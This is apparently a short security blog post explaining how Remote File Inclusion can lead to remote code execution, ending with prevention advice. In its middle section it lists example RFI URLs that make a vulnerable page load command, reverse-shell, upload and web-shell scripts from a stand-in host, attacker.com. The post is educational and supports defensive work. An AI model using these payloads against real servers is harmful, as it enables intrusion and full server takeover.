Remote File Inclusion(RFI) to RCE

Aditya Chauhan
3 min readFeb 15, 2023

Remote File Inclusion (RFI) is a type of web application vulnerability that allows attackers to remotely execute code on a vulnerable web server. In an RFI attack, an attacker is able to manipulate a web application to include a file from a remote server, which can contain malicious code that is executed on the web server. This can lead to remote code execution (RCE), which is a serious security issue that can allow an attacker to take complete control of the web server.

The basic principle of an RFI attack is to trick a web application into loading a file from a remote server. Typically, this involves manipulating the web application's input parameters to include a URL that points to a malicious file hosted on a remote server. When the application processes this input, it fetches the contents of the remote file and includes it in the application's output. This can lead to the execution of malicious code, including RCE payloads that give the attacker complete control over the server.

There are several ways to exploit an RFI vulnerability to achieve RCE. Some of the most common payloads used in RFI attacks include:

  1. Command Injection payloads: These payloads involve including a command that is executed on the web server. For example, an attacker could include a command to create a new user account on the server, which would give the attacker administrative access.
  2. Reverse Shell payloads: These payloads involve including a reverse shell script that connects back to the attacker's system. Once the shell is established, the attacker can execute commands on the server and take control of the system.
  3. File Upload payloads: These payloads involve including a file upload script that allows the attacker to upload and execute a malicious file on the server.
  4. Web Shell payloads: These payloads involve including a web shell script that provides the attacker with a web-based interface for executing commands on the server.

Here are some specific examples of RFI payloads that can be used to achieve RCE:

  1. Command Injection payload:
http://example.com/index.php?page=http://attacker.com/cmd.php?cmd=id

This payload will execute the 'id' command on the server, which will return the current user ID and group ID.

2.Reverse Shell payload:

http://example.com/index.php?page=http://attacker.com/shell.php

This payload will establish a reverse shell connection to the attacker's system. The attacker can then use the shell to execute commands on the server.

3.File Upload payload:

http://example.com/index.php?page=http://attacker.com/upload.php

This payload will allow the attacker to upload a malicious file to the server, which can then be executed to achieve RCE.

4.Web Shell payload:

http://example.com/index.php?page=http://attacker.com/webshell.php

This payload will provide the attacker with a web-based interface for executing commands on the server.

In order to prevent RFI attacks that can lead to RCE, it is important for web application developers to implement proper input validation and sanitization. They should also use security frameworks and libraries that can help detect and prevent RFI attacks. Additionally, server administrators should limit access to the server's file system and use firewalls to block access to remote servers.

In conclusion, RFI to RCE attacks are a serious security issue that can allow attackers to take complete control of a web server. Web application developers and server administrators should take steps to prevent these types of attacks by implementing proper security measures and best practices.

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher